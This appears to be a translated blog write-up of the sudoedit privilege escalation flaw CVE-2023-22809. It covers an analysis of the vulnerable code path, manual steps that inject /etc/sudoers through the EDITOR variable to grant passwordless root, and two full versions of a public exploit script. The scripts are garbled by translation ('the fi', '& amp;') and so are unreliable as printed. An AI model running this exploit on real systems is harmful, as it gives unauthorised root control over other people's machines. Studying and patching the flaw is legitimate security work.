Linux Sudo privilege escalation vulnerability reappears (CVE-2023-22809)

@[TOC](Linux Sudo privilege escalation vulnerability recurrence (CVE-2023-22809))

Foreword

● Vulnerability introduction: sudoedit in Sudo has a flaw in handling extra parameters passed in user-provided environment variables (such as SUDO_EDITOR, VISUAL, and EDITOR). When a user-specified editor contains the “-” parameter that bypasses the sudoers policy, a local attacker with sudoedit access can ultimately achieve privilege escalation on the target system by appending arbitrary entries to the list of files to be processed (authored by normal user to superuser, i.e. “root”).
● Vulnerability number: CVE-2023-22809
● Vulnerability level: high risk
● Vulnerability score: 7.8 points
● Affected versions: sudo 1.8.0-sudo 1.9.12p1(sudo>=1.8.0 or sudo <=1.9.12p1)
● Attack effect: local privilege escalation

Vulnerability Analysis

The analysis in the reference link is very clear, and the general process is as follows:
Execute command: EDITOR=”vim – /etc/sudoers” sudoedit /etc/test

  1. To determine the use program, set the mode to MODE_EDIT for sudoedit and enter the corresponding branch to determine.

  2. Call policy_check->sudoers_policy_check->sudoers_policy_main->sudoers_lookup to read the contents of the sudoers file and verify whether the user has permission to execute the command. This is also one of the attack conditions of this vulnerability. If there is no permission, the sudoers_lookup function cannot be bypassed.

  3. find_editor checks whether the three environment variables SUDO_EDITOR, VISUAL, and EDITOR exist. If each environment variable exists, resolve_editor is called. Resolve_editor is a function that parses paths and commands. The parsed command is vim – /etc/sudoers – /etc/test

  4. sudoedit first sets up ROOT permissions and a temporary writable directory. Since it already has root permissions at this time, you can edit any file when you get to this step. Focus on these lines of code.

  5. At this time, the file /etc/sudoers injected through the additional parameters of the environment variable will be opened with super user permissions for writing. Because any sensitive file can be edited, privileges can be escalated in different ways: modify /etc/shadow to empty password, modify Root is the user name in /etc/passwd. Modify /etc/sudoers to specify that user X can perform any operation without a password.

Elevation of privilege

  1. First create /etc/test, then edit /etc/sudoers and add (user is the attacker’s username) at the end of the file.
 user ALL=(ALL:ALL) NOPASSWD: sudoedit /etc/test
#Enables users to execute sudoedit /etc/test without entering a password, which is also a necessary condition for attacks.
#From editing with super user permissions on a file to editing with super user permissions on any file to elevating privileges
  1. In the command line, enter EDITOR=”vim – /etc/sudoers” sudoedit /etc/test and add it to the opened sodoers file (user is the attacker’s user name)
 user ALL=(ALL:ALL) NOPASSWD: ALL
  1. Save and exit. At this point, the privilege escalation has been successful. User “user” does not need to enter a password when executing any command and has permission to execute any command as any user.
  2. sudo su switch superuser

During the specific local implementation, some problems with providing exp were discovered.
Original exp:

#!/usr/bin/env bash
#
# Exploit Title: sudo 1.8.0 - 1.9.12p1 - Privilege Escalation
#
# Exploit Author: n3m1.sys
# CVE: CVE-2023-22809
# Date: 2023/01/21
# Vendor Homepage: https://www.sudo.ws/
# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz
# Version: 1.8.0 to 1.9.12p1
# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9
#
# Running this exploit on a vulnerable system allows a localiattacker to gain
# a root shell on the machine.
#
# The exploit checks if the current user has privileges to run sudoedit or
# sudo -e on a file as root. If so it will open the sudoers file for the
# attacker to add a line to gain privileges on all the files and get a root
# shell.

if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?| 1\.9\.12p1)$'
then
    echo ">Currently installed sudo version is not vulnerable"
    exit 1
the fi

EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\ )' | cut -d ')' -f 2-)

if [ -z "$EXPLOITABLE" ]; then
    echo "> It doesn't seem that this user can run sudoedit as root"
    read -p "Do you want to proceed anyway? (y/N): " confirm & amp; & amp; [[ $confirm == [yY] ]] || exit 2
else
    echo "> BINGO! User exploitable"
the fi

echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
echo "$USER ALL=(ALL:ALL) ALL"
read -n 1 -s -r -p "Press any key to continue..."
EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
sudo su root
exit 0

  1. EXPLOITABLE=$(sudo -l | grep -E “sudoedit|sudo -e” | grep -E ‘(root)|(ALL)|(ALL : ALL)’ | cut -d ‘)’ -f 2-)main Extract the lines with sudoedit execution permissions from the list of commands authorized to be executed in the sudoers configuration and filter them, such as sudoedit /etc/test. The actual execution will be filtered into:

    Need to filter out NOPASSWD:

  2. The prerequisite for elevating rights is that you need super user editing permissions on a certain file, which is the search and filter section above.

    This has not been reproduced successfully. The reason for successfully obtaining root permissions is that the sudo command has authentication cache time. That is, after using the sudo command for authentication, during the caching period, if you run the sudo command again, it will not prompt for a password, but directly use the cached authentication information to execute the command.

  3. During normal execution, sudo -l requires authentication, or has been authenticated before. Because of the authentication cache, whether sudo su is used successfully or not, the rights will be escalated successfully. If the injected file is opened and modified normally, the use will be successful. Or add the following line in sudoers file to disable identity cache

 Defaults env_reset, timestamp_timeout=0
  1. Add USER ALL=(ALL:ALL) ALL to the sudoers file. Authentication may still be required when executing the command. You need to add USER ALL=(ALL:ALL) NOPASSWD: ALL so that password authentication is not required during execution.

Changed exp

#!/usr/bin/env bash
#
# Exploit Title: sudo 1.8.0 - 1.9.12p1 - Privilege Escalation
#
# Exploit Author: n3m1.sys
# CVE: CVE-2023-22809
# Date: 2023/01/21
# Vendor Homepage: https://www.sudo.ws/
# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz
# Version: 1.8.0 to 1.9.12p1
# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9
#
# Running this exploit on a vulnerable system allows a locali attacker to gain
# a root shell on the machine.
#
# The exploit checks if the current user has privileges to run sudoedit or
# sudo -e on a file as root. If so it will open the sudoers file for the
# attacker to add a line to gain privileges on all the files and get a root
# shell.

if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?| 1\.9\.12p1)$'
then
    echo "> Currently installed sudo version is not vulnerable"
    exit 1
the fi

EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\ )' | grep -oP "sudoedit.*")

if [ -z "$EXPLOITABLE" ]; then
    echo "> It doesn't seem that this user can run sudoedit as root"
    read -p "Do you want to proceed anyway? (y/N): " confirm & amp; & amp; [[ $confirm == [yY] ]] || exit 2
else
    echo "> BINGO! User exploitable"
the fi

echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
echo "$USER ALL=(ALL:ALL) NOPASSWD:ALL"
read -n 1 -s -r -p "Press any key to continue..."
EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
sudo su root
exit 0

Reference

https://bbs.kanxue.com/thread-277242.htm#msg_header_h2_1
https://blog.csdn.net/weixin_46944519/article/details/129971508